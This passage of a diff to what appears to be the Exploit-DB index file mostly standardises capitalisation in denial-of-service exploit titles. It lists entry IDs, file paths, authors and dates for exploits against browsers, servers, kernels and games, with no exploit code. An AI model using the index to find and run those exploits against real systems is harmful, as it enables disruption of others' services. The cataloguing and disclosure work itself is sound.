karak0rsan",windows,dos,0 32836,platforms/multiple/dos/32836.html,"Mozilla Firefox 2.0.x - Nested 'window.print()' Denial of Service",2009-03-03,b3hz4d,multiple,dos,0 -32838,platforms/linux/dos/32838.txt,"MySQL 6.0.9 - XPath Expression Remote Denial Of Service",2009-02-14,"Shane Bester",linux,dos,0 +32838,platforms/linux/dos/32838.txt,"MySQL 6.0.9 - XPath Expression Remote Denial of Service",2009-02-14,"Shane Bester",linux,dos,0 32849,platforms/linux/dos/32849.txt,"PostgreSQL 8.3.6 - Conversion Encoding Remote Denial of Service",2009-03-11,"Afonin Denis",linux,dos,0 -32856,platforms/linux/dos/32856.txt,"MPlayer - Malformed AAC File Handling Denial of Service",2008-10-07,"Hanno Bock",linux,dos,0 -32857,platforms/linux/dos/32857.txt,"MPlayer - Malformed OGM File Handling Denial of Service",2008-10-07,"Hanno Bock",linux,dos,0 +32856,platforms/linux/dos/32856.txt,"MPlayer - '.AAC' File Handling Denial of Service",2008-10-07,"Hanno Bock",linux,dos,0 +32857,platforms/linux/dos/32857.txt,"MPlayer - '.OGM' File Handling Denial of Service",2008-10-07,"Hanno Bock",linux,dos,0 32860,platforms/java/dos/32860.txt,"Sun Java System Calendar Server 6.3 - Duplicate URI Request Denial of Service",2009-03-31,"SCS team",java,dos,0 32865,platforms/multiple/dos/32865.py,"WhatsApp < 2.11.7 - Remote Crash",2014-04-14,"Jaime Sánchez",multiple,dos,0 32881,platforms/windows/dos/32881.py,"QtWeb Browser 2.0 - Malformed HTML File Remote Denial of Service",2009-04-01,LiquidWorm,windows,dos,0 @@ -4132,7 +4131,7 @@ id,file,description,date,author,platform,type,port 32902,platforms/windows/dos/32902.py,"Microsoft Internet Explorer 8 - File Download Denial of Service",2009-04-11,"Nam Nguyen",windows,dos,0 32926,platforms/linux/dos/32926.c,"Linux group_info refcounter - Overflow Memory Corruption",2014-04-18,"Thomas Pollet",linux,dos,0 32939,platforms/windows/dos/32939.txt,"Trend Micro OfficeScan 8.0 Client - Denial of Service",2009-04-21,"Juan Pablo Lopez Yacubian",windows,dos,0 -32949,platforms/multiple/dos/32949.txt,"Mani's Admin Plugin - Remote Denial Of Service",2009-04-22,M4rt1n,multiple,dos,0 +32949,platforms/multiple/dos/32949.txt,"Mani's Admin Plugin - Remote Denial of Service",2009-04-22,M4rt1n,multiple,dos,0 32951,platforms/novell/dos/32951.py,"Recover Data for Novell Netware 1.0 - '.sav' Remote Denial of Service",2009-04-23,"AbdulAziz Hariri",novell,dos,0 32956,platforms/windows/dos/32956.py,"RealNetworks RealPlayer Gold 10.0 MP3 - File Handling Remote Denial of Service",2009-04-27,"Abdul-Aziz Hariri",windows,dos,0 33337,platforms/osx/dos/33337.c,"Apple Mac OSX 10.5.x - 'ptrace' Mutex Handling Local Denial of Service",2009-11-04,"Micheal Turner",osx,dos,0 @@ -4142,12 +4141,12 @@ id,file,description,date,author,platform,type,port 32995,platforms/linux/dos/32995.txt,"Sendmail 8.12.x - 'X-header' Remote Heap Buffer Overflow",2009-05-27,"Simple Nomad",linux,dos,0 33015,platforms/linux/dos/33015.c,"Linux Kernel 2.6.x - 'splice(2)' Double Lock Local Denial of Service",2009-05-29,"Miklos Szeredi",linux,dos,0 33017,platforms/linux/dos/33017.txt,"Adobe Acrobat 9.1.3 - Stack Exhaustion Denial of Service",2009-05-29,"Saint Patrick",linux,dos,0 -33018,platforms/windows/dos/33018.txt,"cFos Personal Net 3.09 - Remote Heap Memory Corruption (Denial Of Service)",2014-04-25,LiquidWorm,windows,dos,0 -33020,platforms/linux/dos/33020.py,"CUPS 1.3.9 - 'cups/ipp.c' Null Pointer Dereference Denial Of Service",2009-06-02,"Anibal Sacco",linux,dos,0 +33018,platforms/windows/dos/33018.txt,"cFos Personal Net 3.09 - Remote Heap Memory Corruption (Denial of Service)",2014-04-25,LiquidWorm,windows,dos,0 +33020,platforms/linux/dos/33020.py,"CUPS 1.3.9 - 'cups/ipp.c' Null Pointer Dereference Denial of Service",2009-06-02,"Anibal Sacco",linux,dos,0 33031,platforms/linux/dos/33031.html,"Mozilla Firefox 3.0.x - Large GIF File Background Denial of Service",2009-05-10,"Ahmad Muammar",linux,dos,0 -33036,platforms/linux/dos/33036.txt,"Git 1.6.3 - Parameter Processing Remote Denial Of Service",2009-05-05,"Shawn O. Pearce",linux,dos,0 +33036,platforms/linux/dos/33036.txt,"Git 1.6.3 - Parameter Processing Remote Denial of Service",2009-05-05,"Shawn O. Pearce",linux,dos,0 33037,platforms/multiple/dos/33037.html,"Apple QuickTime 7.4.1 - Null Pointer Dereference Denial of Service",2009-05-14,"Thierry Zoller",multiple,dos,0 -33040,platforms/linux/dos/33040.txt,"GUPnP 0.12.7 - Message Handling Denial Of Service",2009-05-03,"Zeeshan Ali",linux,dos,0 +33040,platforms/linux/dos/33040.txt,"GUPnP 0.12.7 - Message Handling Denial of Service",2009-05-03,"Zeeshan Ali",linux,dos,0 33041,platforms/linux/dos/33041.txt,"Irssi 0.8.13 - 'WALLOPS' Message Off-by-One Heap Memory Corruption",2009-05-15,nemo,linux,dos,0 33042,platforms/linux/dos/33042.txt,"Mozilla Firefox 3.0.10 - 'nsViewManager.cpp' Denial of Service",2009-05-11,"Bret McMillan",linux,dos,0 33043,platforms/linux/dos/33043.txt,"Linux Kernel 2.6.x - '/proc/iomem' Sparc64 Local Denial of Service",2009-05-03,"Mikulas Patocka",linux,dos,0 @@ -4177,7 +4176,7 @@ id,file,description,date,author,platform,type,port 33173,platforms/windows/dos/33173.html,"Microsoft Internet Explorer 6/7/8 - 'li' Element Denial of Service (1)",2007-02-07,trevordixon,windows,dos,0 33174,platforms/windows/dos/33174.html,"Microsoft Internet Explorer 6/7/8 - 'li' Element Denial of Service (2)",2007-02-07,trevordixon,windows,dos,0 33175,platforms/windows/dos/33175.txt,"Microsoft Internet Explorer 6/7/8 - 'li' Element Denial of Service (3)",2007-02-07,trevordixon,windows,dos,0 -33176,platforms/linux/dos/33176.rb,"ntop 3.3.10 - HTTP Basic Authentication Null Pointer Dereference Denial Of Service",2009-08-18,"Brad Antoniewicz",linux,dos,0 +33176,platforms/linux/dos/33176.rb,"ntop 3.3.10 - HTTP Basic Authentication Null Pointer Dereference Denial of Service",2009-08-18,"Brad Antoniewicz",linux,dos,0 33182,platforms/multiple/dos/33182.txt,"Live For Speed S2 - Duplicate Join Packet Remote Denial of Service",2009-08-23,"Luigi Auriemma",multiple,dos,0 33183,platforms/novell/dos/33183.html,"Novell Client 4.91.5 - ActiveX Control 'nwsetup.dll' Unspecified Remote Denial of Service (1)",2009-08-25,"Francis Provencher",novell,dos,0 33184,platforms/novell/dos/33184.html,"Novell Client 4.91.5 - ActiveX Control 'nwsetup.dll' Unspecified Remote Denial of Service (2)",2009-08-25,"Francis Provencher",novell,dos,0 @@ -4185,7 +4184,7 @@ id,file,description,date,author,platform,type,port 33193,platforms/linux/dos/33193.c,"Linux Kernel 2.6.x - 'drivers/char/tty_ldisc.c' Null Pointer Dereference Denial of Service",2009-08-19,"Eric W. Biederman",linux,dos,0 33205,platforms/windows/dos/33205.pl,"Nokia MultiMedia Player 1.1 - Remote Denial of Service",2009-09-01,"opt!x hacker",windows,dos,0 33216,platforms/hardware/dos/33216.txt,"Check Point Endpoint Security - Full Disk Encryption RDP Connection Denial of Service",2009-09-09,"Tim Medin",hardware,dos,0 -33220,platforms/windows/dos/33220.txt,"FileCOPA FTP Server 5.01 - 'NOOP' Command Denial Of Service",2009-09-15,"Asheesh kumar Mani Tripathi",windows,dos,0 +33220,platforms/windows/dos/33220.txt,"FileCOPA FTP Server 5.01 - 'NOOP' Command Denial of Service",2009-09-15,"Asheesh kumar Mani Tripathi",windows,dos,0 33221,platforms/windows/dos/33221.html,"Novell Groupwise Client 7.0.3.1294 - 'gxmim1.dll' ActiveX Control Buffer Overflow",2009-09-15,"Francis Provencher",windows,dos,0 33222,platforms/linux/dos/33222.txt,"Wireshark 1.2.1 - OpcUa Dissector Unspecified Resource Exhaustion Denial of Service",2009-09-15,"Buildbot Builder",linux,dos,0 33223,platforms/linux/dos/33223.txt,"Wireshark 1.2.1 - TLS Dissector 1.2 Conversation Handling Unspecified Remote Denial of Service",2009-09-15,"Buildbot Builder",linux,dos,0 @@ -4202,14 +4201,14 @@ id,file,description,date,author,platform,type,port 33280,platforms/hardware/dos/33280.txt,"Palm WebOS 1.0/1.1 - 'LunaSysMgr' Service Denial of Service",2009-10-13,"Townsend Ladd Harris",hardware,dos,0 33283,platforms/linux/dos/33283.txt,"Adobe Reader 9.1.3 and Acrobat - COM Objects Memory Corruption Remote Code Execution",2009-10-13,Skylined,linux,dos,0 33289,platforms/linux/dos/33289.txt,"Linux Kernel 2.6.x - '/drivers/net/r8169.c' Out-of-IOMMU Error Local Denial of Service",2009-08-28,"Alistair Strachan",linux,dos,0 -33306,platforms/linux/dos/33306.txt,"Snort 2.8.5 - Multiple Denial Of Service Vulnerabilities",2009-10-22,"laurent gaffie",linux,dos,0 +33306,platforms/linux/dos/33306.txt,"Snort 2.8.5 - Multiple Denial of Service Vulnerabilities",2009-10-22,"laurent gaffie",linux,dos,0 33312,platforms/linux/dos/33312.txt,"Mozilla Firefox 3.5.3 - Floating Point Conversion Heap Overflow",2009-10-27,"Alin Rad Pop",linux,dos,0 33314,platforms/linux/dos/33314.html,"Mozilla Firefox 3.0.14 - Remote Memory Corruption",2009-10-27,"Carsten Book",linux,dos,0 33318,platforms/bsd/dos/33318.txt,"OpenBSD 4.6 / NetBSD 5.0.1 - 'printf(1)' Format String Parsing Denial of Service",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0 33319,platforms/bsd/dos/33319.txt,"Multiple BSD Distributions - 'printf(3)' Memory Corruption",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0 -33591,platforms/linux/dos/33591.sh,"lighttpd 1.4/1.5 - Slow Request Handling Remote Denial Of Service",2010-02-02,"Li Ming",linux,dos,0 +33591,platforms/linux/dos/33591.sh,"lighttpd 1.4/1.5 - Slow Request Handling Remote Denial of Service",2010-02-02,"Li Ming",linux,dos,0 33592,platforms/linux/dos/33592.txt,"Linux Kernel 2.6.x - KVM 'pit_ioport_read()' Local Denial of Service",2010-02-02,"Marcelo Tosatti",linux,dos,0 -33328,platforms/hardware/dos/33328.txt,"Skybox Security 6.3.x < 6.4.x - Multiple Denial Of Service Issue",2014-05-12,"Luigi Vezzoso",hardware,dos,0 +33328,platforms/hardware/dos/33328.txt,"Skybox Security 6.3.x < 6.4.x - Multiple Denial of Service Issue",2014-05-12,"Luigi Vezzoso",hardware,dos,0 33332,platforms/windows/dos/33332.py,"JetAudio 8.1.1 - '.ogg' Crash (PoC)",2014-05-12,"Aryan Bayaninejad",windows,dos,0 33335,platforms/windows/dos/33335.py,"GOM Player 2.2.57.5189 - '.ogg' Crash (PoC)",2014-05-12,"Aryan Bayaninejad",windows,dos,0 33384,platforms/windows/dos/33384.py,"Wireshark 1.10.7 - Denial of Service (PoC)",2014-05-16,"Osanda Malith",windows,dos,0 @@ -4221,7 +4220,7 @@ id,file,description,date,author,platform,type,port 33480,platforms/linux/dos/33480.txt,"MATLAB R2009b - 'dtoa' Implementation Memory Corruption",2010-01-08,"Maksymilian Arciemowicz",linux,dos,0 33483,platforms/multiple/dos/33483.py,"Sun Java System Directory Server 7.0 - 'core_get_proxyauth_dn' Denial of Service",2010-01-10,Intevydis,multiple,dos,0 33495,platforms/windows/dos/33495.py,"Core FTP Server 1.2 build 535 (32-bi)t - Crash (PoC)",2014-05-24,"Kaczinski Ramirez",windows,dos,0 -33581,platforms/linux/dos/33581.txt,"Hybserv2 - ':help' Command Denial Of Service",2010-01-29,"Julien Cristau",linux,dos,0 +33581,platforms/linux/dos/33581.txt,"Hybserv2 - ':help' Command Denial of Service",2010-01-29,"Julien Cristau",linux,dos,0 33583,platforms/hardware/dos/33583.pl,"Xerox WorkCentre - PJL Daemon Buffer Overflow",2009-12-31,"Francis Provencher",hardware,dos,0 33506,platforms/multiple/dos/33506.py,"Oracle Database - Remote Listener Memory Corruption",2010-01-12,"Dennis Yurichev",multiple,dos,0 33635,platforms/linux/dos/33635.c,"Linux Kernel 2.6.x - 'net/ipv6/ip6_output.c' Null Pointer Dereference Denial of Service",2008-07-31,"Rémi Denis-Courmont",linux,dos,0 @@ -4238,30 +4237,30 @@ id,file,description,date,author,platform,type,port 33571,platforms/linux/dos/33571.txt,"PostgreSQL - 'bitsubstr' Buffer Overflow",2010-01-27,Intevydis,linux,dos,0 33585,platforms/linux/dos/33585.txt,"Linux Kernel 2.6.x (x64) - Personality Handling Local Denial of Service",2010-02-01,"Mathias Krause",linux,dos,0 33587,platforms/windows/dos/33587.html,"Microsoft Internet Explorer 11 - WeakMap Integer Divide-by-Zero",2014-05-30,"Pawel Wylecial",windows,dos,0 -33607,platforms/multiple/dos/33607.html,"Mozilla Firefox 3.5.x and SeaMonkey 2.0.1 - Remote Denial Of Service",2010-02-07,"599eme Man",multiple,dos,0 -33608,platforms/windows/dos/33608.html,"Apple Safari 4.0.4 - Remote Denial Of Service",2010-02-07,"599eme Man",windows,dos,0 +33607,platforms/multiple/dos/33607.html,"Mozilla Firefox 3.5.x and SeaMonkey 2.0.1 - Remote Denial of Service",2010-02-07,"599eme Man",multiple,dos,0 +33608,platforms/windows/dos/33608.html,"Apple Safari 4.0.4 - Remote Denial of Service",2010-02-07,"599eme Man",windows,dos,0 33625,platforms/php/dos/33625.php,"PHP 5.3.1 - 'session_save_path()' 'Safe_mode' Restriction-Bypass",2010-02-11,"Grzegorz Stachowiak",php,dos,0 33713,platforms/windows/dos/33713.py,"Core FTP LE 2.2 - Heap Overflow (PoC)",2014-06-11,"Gabor Seljan",windows,dos,0 33677,platforms/php/dos/33677.txt,"PHP 5.3.1 - LCG Entropy Security",2010-02-26,Rasmus,php,dos,0 33672,platforms/linux/dos/33672.txt,"Kojoney 0.0.4.1 - 'urllib.urlopen()' Remote Denial of Service",2010-02-24,Nicob,linux,dos,0 33707,platforms/windows/dos/33707.txt,"Orb Networks 2.54.18 - Orb Direct Show Filter MP3 File Divide-by-Zero Denial of Service",2010-03-04,"Matthew Bergin",windows,dos,0 -33708,platforms/bsd/dos/33708.c,"FreeBSD 8.0 / OpenBSD 4.x - 'ftpd' Null Pointer Dereference Denial Of Service",2010-03-05,kingcope,bsd,dos,0 +33708,platforms/bsd/dos/33708.c,"FreeBSD 8.0 / OpenBSD 4.x - 'ftpd' Null Pointer Dereference Denial of Service",2010-03-05,kingcope,bsd,dos,0 33838,platforms/windows/dos/33838.py,"Mocha W32 LPD 1.9 - Remote Buffer Overflow",2010-04-15,mr_me,windows,dos,0 33711,platforms/windows/dos/33711.txt,"BS.Player 2.51 - '.mp3' Buffer Overflow",2010-03-05,"Gjoko Krstic",windows,dos,0 33719,platforms/windows/dos/33719.py,"Microsoft Windows XP/Vista - '.ani' 'tagBITMAPINFOHEADER' Denial of Service",2010-03-08,Skylined,windows,dos,0 -33729,platforms/multiple/dos/33729.txt,"PostgreSQL 8.4.1 - JOIN Hashtable Size Integer Overflow Denial Of Service",2014-06-13,"Bernt Marius Johnsen",multiple,dos,0 +33729,platforms/multiple/dos/33729.txt,"PostgreSQL 8.4.1 - JOIN Hashtable Size Integer Overflow Denial of Service",2014-06-13,"Bernt Marius Johnsen",multiple,dos,0 33733,platforms/windows/dos/33733.pl,"httpdx 1.5.3 - '.png' File Handling Remote Denial of Service",2010-03-10,"Jonathan Salwan",windows,dos,0 33735,platforms/multiple/dos/33735.txt,"SUPERAntiSpyware 4.34.1000 and SuperAdBlocker 4.6.1000 - Multiple Vulnerabilities",2010-03-10,"Luka Milkovic",multiple,dos,0 33737,platforms/hardware/dos/33737.py,"ZTE / TP-Link RomPager - Denial of Service",2014-06-13,"Osanda Malith",hardware,dos,0 33755,platforms/php/dos/33755.php,"PHP 5.3.2 xmlrpc Extension - Multiple Remote Denial of Service Vulnerabilities",2010-03-12,"Auke van Slooten",php,dos,0 33770,platforms/windows/dos/33770.txt,"Microsoft Windows Media Player 11 - AVI File Colorspace Conversion Remote Memory Corruption",2010-03-17,ITSecTeam,windows,dos,0 33775,platforms/windows/dos/33775.py,"Xilisoft Video Converter Wizard - '.yuv' Stack Buffer Overflow",2010-03-19,ITSecTeam,windows,dos,0 -33778,platforms/windows/dos/33778.pl,"Remote Help HTTP 0.0.7 - GET Request Format String Denial Of Service",2010-03-20,Rick2600,windows,dos,0 +33778,platforms/windows/dos/33778.pl,"Remote Help HTTP 0.0.7 - GET Request Format String Denial of Service",2010-03-20,Rick2600,windows,dos,0 33800,platforms/multiple/dos/33800.html,"Mozilla Firefox 3.6 - 'gfxTextRun::SanitizeGlyphRuns()' Remote Memory Corruption",2010-03-24,"Jesse Ruderman",multiple,dos,0 33801,platforms/linux/dos/33801.txt,"Mozilla Firefox/Thunderbird/SeaMonkey - Multiple Memory Corruption Vulnerabilities",2010-03-24,"Bob Clary",linux,dos,0 33804,platforms/windows/dos/33804.pl,"Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow",2014-06-18,LiquidWorm,windows,dos,0 33819,platforms/windows/dos/33819.txt,"McAfee Email Gateway < 6.7.2 Hotfix 2 - Multiple Vulnerabilities",2010-04-06,"Nahuel Grisolia",windows,dos,0 -33849,platforms/windows/dos/33849.txt,"netKar PRO 1.1 - '.nkuser' File Creation Null Pointer Denial Of Service",2014-06-13,"A reliable source",windows,dos,0 +33849,platforms/windows/dos/33849.txt,"netKar PRO 1.1 - '.nkuser' File Creation Null Pointer Denial of Service",2014-06-13,"A reliable source",windows,dos,0 33850,platforms/linux/dos/33850.txt,"memcached 1.4.2 - Memory Consumption Remote Denial of Service",2010-04-27,fallenpegasus,linux,dos,0 33860,platforms/windows/dos/33860.html,"Microsoft Internet Explorer 8 / 9 / 10 - CInput Use-After-Free Crash PoC (MS14-035)",2014-06-24,"Drozdova Liudmila",windows,dos,0 34145,platforms/unix/dos/34145.txt,"Python 3.2 - 'audioop' Module Memory Corruption",2010-06-14,haypo,unix,dos,0 @@ -4272,15 +4271,15 @@ id,file,description,date,author,platform,type,port 40097,platforms/multiple/dos/40097.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (3)",2016-07-13,COSIG,multiple,dos,0 40098,platforms/multiple/dos/40098.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (4)",2016-07-13,COSIG,multiple,dos,0 34102,platforms/linux/dos/34102.py,"ACME micro_httpd - Denial of Service",2014-07-18,"Yuval tisf Nativ",linux,dos,80 -33965,platforms/linux/dos/33965.txt,"Geo++ GNCASTER 1.4.0.7 - HTTP GET Request Denial Of Service",2010-01-27,"RedTeam Pentesting GmbH",linux,dos,0 -33966,platforms/linux/dos/33966.rb,"Geo++ GNCASTER 1.4.0.7 NMEA-data - Denial Of Service",2010-01-27,"RedTeam Pentesting GmbH",linux,dos,0 -33968,platforms/windows/dos/33968.pl,"Xitami 5.0 - '/AUX' Request Remote Denial Of Service",2010-05-10,"Usman Saeed",windows,dos,0 +33965,platforms/linux/dos/33965.txt,"Geo++ GNCASTER 1.4.0.7 - HTTP GET Request Denial of Service",2010-01-27,"RedTeam Pentesting GmbH",linux,dos,0 +33966,platforms/linux/dos/33966.rb,"Geo++ GNCASTER 1.4.0.7 NMEA-data - Denial of Service",2010-01-27,"RedTeam Pentesting GmbH",linux,dos,0 +33968,platforms/windows/dos/33968.pl,"Xitami 5.0 - '/AUX' Request Remote Denial of Service",2010-05-10,"Usman Saeed",windows,dos,0 33924,platforms/windows/dos/33924.py,"RealVNC 4.1.3 - 'ClientCutText' Message Remote Denial of Service",2010-05-02,"John Leitch",windows,dos,0 33926,platforms/windows/dos/33926.py,"ddrLPD 1.0 - Remote Denial of Service",2010-04-29,"Bisphemol A",windows,dos,0 33943,platforms/aix/dos/33943.txt,"Flussonic Media Server 4.1.25 < 4.3.3 - Arbitrary File Disclosure",2014-07-01,"BGA Security",aix,dos,8080 33951,platforms/windows/dos/33951.txt,"Baidu Spark Browser 26.5.9999.3511 - Remote Stack Overflow (Denial of Service)",2014-07-02,LiquidWorm,windows,dos,0 33973,platforms/windows/dos/33973.pl,"Hyplay 1.2.0326.1 - '.asx' Remote Denial of Service",2010-05-10,"Steve James",windows,dos,0 -33977,platforms/windows/dos/33977.txt,"Torque Game Engine - Multiple Denial Of Service Vulnerabilities",2010-05-09,"Luigi Auriemma",windows,dos,0 +33977,platforms/windows/dos/33977.txt,"Torque Game Engine - Multiple Denial of Service Vulnerabilities",2010-05-09,"Luigi Auriemma",windows,dos,0 34010,platforms/win_x86/dos/34010.html,"Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption PoC (MS14-035)",2014-07-08,"Drozdova Liudmila",win_x86,dos,0 34027,platforms/solaris/dos/34027.txt,"Sun Solaris 10 - Nested Directory Tree Local Denial of Service",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0 34028,platforms/solaris/dos/34028.txt,"Sun Solaris 10 - 'in.ftpd' Long Command Handling Security",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0 @@ -4288,24 +4287,24 @@ id,file,description,date,author,platform,type,port 34058,platforms/multiple/dos/34058.txt,"DM Database Server - 'SP_DEL_BAK_EXPIRED' Memory Corruption",2010-05-31,"Shennan Wang HuaweiSymantec SRT",multiple,dos,0 34069,platforms/windows/dos/34069.html,"Microsoft Internet Explorer 8 - CSS 'expression' Remote Denial of Service",2010-01-01,MustLive,windows,dos,0 34090,platforms/multiple/dos/34090.py,"Node Browserify 4.2.0 - Remote Code Execution",2014-07-16,"Cal Leeming",multiple,dos,0 -34093,platforms/windows/dos/34093.txt,"EA Battlefield 2 1.41 / Battlefield 2142 1.50 - Multiple Denial Of Service Vulnerabilities",2010-06-07,"Francis Lavoie-Renaud",windows,dos,0 +34093,platforms/windows/dos/34093.txt,"EA Battlefield 2 1.41 / Battlefield 2142 1.50 - Multiple Denial of Service Vulnerabilities",2010-06-07,"Francis Lavoie-Renaud",windows,dos,0 34094,platforms/windows/dos/34094.pl,"Aqua Real Screensaver - '.ar' Buffer Overflow",2010-01-15,R3d-D3V!L,windows,dos,0 -34340,platforms/multiple/dos/34340.txt,"Unreal Engine - 'ReceivedRawBunch()' Denial Of Service",2010-07-15,"Luigi Auriemma",multiple,dos,0 +34340,platforms/multiple/dos/34340.txt,"Unreal Engine - 'ReceivedRawBunch()' Denial of Service",2010-07-15,"Luigi Auriemma",multiple,dos,0 34129,platforms/windows/dos/34129.txt,"World Of Warcraft 3.3.5a (macros-cache.txt) - Stack Overflow",2014-07-21,"Alireza Chegini",windows,dos,0 34133,platforms/linux/dos/34133.txt,"Apache 2.4.7 mod_status - Scoreboard Handling Race Condition",2014-07-21,"Marek Kroemeke",linux,dos,0 34135,platforms/windows/dos/34135.py,"DjVuLibre 3.5.25.3 - Out of Bounds Access Violation",2014-07-22,drone,windows,dos,0 -34158,platforms/windows/dos/34158.txt,"Chrome Engine 4 - Denial Of Service",2010-06-17,"Luigi Auriemma",windows,dos,0 +34158,platforms/windows/dos/34158.txt,"Chrome Engine 4 - Denial of Service",2010-06-17,"Luigi Auriemma",windows,dos,0 34151,platforms/windows/dos/34151.txt,"Adobe SVG Viewer 3.0 - Circle Transform Remote Code Execution",2010-06-16,h07,windows,dos,0 34162,platforms/windows/dos/34162.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH)",2014-07-24,"Gabor Seljan",windows,dos,0 34164,platforms/linux/dos/34164.pl,"Make 3.81 - Heap Overflow (PoC)",2014-07-24,HyP,linux,dos,0 -34172,platforms/hardware/dos/34172.txt,"Sagem Fast 3304-V1 - Denial Of Service",2014-07-27,Z3ro0ne,hardware,dos,0 +34172,platforms/hardware/dos/34172.txt,"Sagem Fast 3304-V1 - Denial of Service",2014-07-27,Z3ro0ne,hardware,dos,0 34203,platforms/hardware/dos/34203.txt,"D-Link DWR-113 Rev. Ax - Cross-Site Request Forgery / Denial of Service",2014-07-30,"Blessen Thomas",hardware,dos,0 34227,platforms/windows/dos/34227.txt,"Qt 4.6.3 - Remote Denial of Service",2010-06-29,"Luigi Auriemma",windows,dos,0 34228,platforms/linux/dos/34228.txt,"Mumble Murmur 1.2 - Denial of Service",2010-06-29,"Luigi Auriemma",linux,dos,0 -34233,platforms/windows/dos/34233.py,"Sumatra PDF 1.1 - Denial Of Service",2010-07-01,"Azim Poonawala",windows,dos,0 +34233,platforms/windows/dos/34233.py,"Sumatra PDF 1.1 - Denial of Service",2010-07-01,"Azim Poonawala",windows,dos,0 34248,platforms/multiple/dos/34248.txt,"EDItran Communications Platform (editcp) 4.1 - Remote Buffer Overflow",2010-07-05,"Pedro Andujar",multiple,dos,0 -34249,platforms/linux/dos/34249.txt,"Freeciv 2.2.1 - Multiple Remote Denial Of Service Vulnerabilities",2010-07-03,"Luigi Auriemma",linux,dos,0 -34251,platforms/windows/dos/34251.txt,"Multiple Tripwire Interactive Games - 'STEAMCLIENTBLOB' Multiple Denial Of Service Vulnerabilities",2010-07-05,"Luigi Auriemma",windows,dos,0 +34249,platforms/linux/dos/34249.txt,"Freeciv 2.2.1 - Multiple Remote Denial of Service Vulnerabilities",2010-07-03,"Luigi Auriemma",linux,dos,0 +34251,platforms/windows/dos/34251.txt,"Multiple Tripwire Interactive Games - 'STEAMCLIENTBLOB' Multiple Denial of Service Vulnerabilities",2010-07-05,"Luigi Auriemma",windows,dos,0 34261,platforms/multiple/dos/34261.txt,"Unreal Engine 2.5 - 'UpdateConnectingMessage()' Remote Stack Buffer Overflow",2010-07-06,"Luigi Auriemma",multiple,dos,0 34270,platforms/multiple/dos/34270.txt,"Ubisoft Ghost Recon Advanced Warfighter - Integer Overflow and Array Indexing Overflow",2010-07-07,"Luigi Auriemma",multiple,dos,0 34278,platforms/linux/dos/34278.txt,"LibTIFF 3.9.4 - Out-Of-Order Tag Type Mismatch Remote Denial of Service",2010-07-12,"Tom Lane",linux,dos,0 @@ -4316,7 +4315,7 @@ id,file,description,date,author,platform,type,port 34307,platforms/hardware/dos/34307.txt,"Sky Broadband Router SR101 - Weak WPA-PSK Generation Algorithm",2014-08-09,"Matt O'Connor",hardware,dos,0 34309,platforms/solaris/dos/34309.txt,"Oracle Solaris - 'rdist' Privilege Escalation",2010-07-13,"Monarch Rich",solaris,dos,0 34348,platforms/linux/dos/34348.txt,"OpenLDAP 2.4.22 - ('modrdn' Request) Multiple Vulnerabilities",2010-07-19,"Ilkka Mattila",linux,dos,0 -34355,platforms/windows/dos/34355.txt,"Microsoft DirectX 8/9 DirectPlay - Multiple Denial Of Service Vulnerabilities",2010-07-18,"Luigi Auriemma",windows,dos,0 +34355,platforms/windows/dos/34355.txt,"Microsoft DirectX 8/9 DirectPlay - Multiple Denial of Service Vulnerabilities",2010-07-18,"Luigi Auriemma",windows,dos,0 34356,platforms/linux/dos/34356.txt,"gif2png 2.5.2 - Remote Buffer Overflow",2009-12-12,"Razuel Akaharnath",linux,dos,0 34359,platforms/windows/dos/34359.html,"Microsoft Outlook Web Access for Exchange Server 2003 - Cross-Site Request Forgery",2010-07-20,anonymous,windows,dos,0 34360,platforms/multiple/dos/34360.txt,"Monolith Lithtech Game Engine - Memory Corruption",2010-07-21,"Luigi Auriemma",multiple,dos,0 @@ -4324,25 +4323,25 @@ id,file,description,date,author,platform,type,port 34368,platforms/windows/dos/34368.c,"Mthree Development MP3 to WAV Decoder - '.mp3' Remote Buffer Overflow",2009-10-31,4m!n,windows,dos,0 34375,platforms/linux/dos/34375.txt,"sSMTP 2.62 - 'standardize()' Buffer Overflow",2010-07-26,"Brendan Boerner",linux,dos,0 34394,platforms/hardware/dos/34394.pl,"D-Link WBR-2310 1.0.4 - HTTP GET Request Remote Buffer Overflow",2010-08-03,"Rodrigo Escobar",hardware,dos,0 -34395,platforms/windows/dos/34395.pl,"PMSoftware Simple Web Server 2.1 - 'From:' Header Processing Remote Denial Of Service",2010-08-03,"Rodrigo Escobar",windows,dos,0 +34395,platforms/windows/dos/34395.pl,"PMSoftware Simple Web Server 2.1 - 'From:' Header Processing Remote Denial of Service",2010-08-03,"Rodrigo Escobar",windows,dos,0 34403,platforms/windows/dos/34403.pl,"Quick 'n Easy FTP Server 3.9.1 - USER Command Remote Buffer Overflow",2010-07-22,demonalex,windows,dos,0 34404,platforms/windows/dos/34404.pl,"K-Meleon 1.x - URI Handling Multiple Denial of Service Vulnerabilities",2010-08-04,Lostmon,windows,dos,0 34427,platforms/linux/dos/34427.txt,"OpenSSL - 'ssl3_get_key_exchange()' Use-After-Free Memory Corruption",2010-08-07,"Georgi Guninski",linux,dos,0 34428,platforms/windows/dos/34428.py,"Quintessential Media Player 5.0.121 - '.m3u' Buffer Overflow",2010-08-09,"Abhishek Lyall",windows,dos,0 34442,platforms/windows/dos/34442.html,"Kylinsoft InstantGet 2.08 - ActiveX Control 'ShowBar' Method Buffer Overflow",2009-09-19,the_Edit0r,windows,dos,0 -34457,platforms/multiple/dos/34457.txt,"Sniper Elite 1.0 - Null Pointer Dereference Denial Of Service",2009-08-14,"Luigi Auriemma",multiple,dos,0 +34457,platforms/multiple/dos/34457.txt,"Sniper Elite 1.0 - Null Pointer Dereference Denial of Service",2009-08-14,"Luigi Auriemma",multiple,dos,0 34458,platforms/windows/dos/34458.html,"Microsoft Internet Explorer - Memory Corruption PoC (MS14-029)",2014-08-28,PhysicalDrive0,windows,dos,0 34460,platforms/windows/dos/34460.py,"Sonique 2.0 - '.xpl' Remote Stack Based Buffer Overflow",2010-08-12,"Hamza_hack_dz & Black-liondz1",windows,dos,0 34463,platforms/windows/dos/34463.py,"HTML Help Workshop 1.4 - Buffer 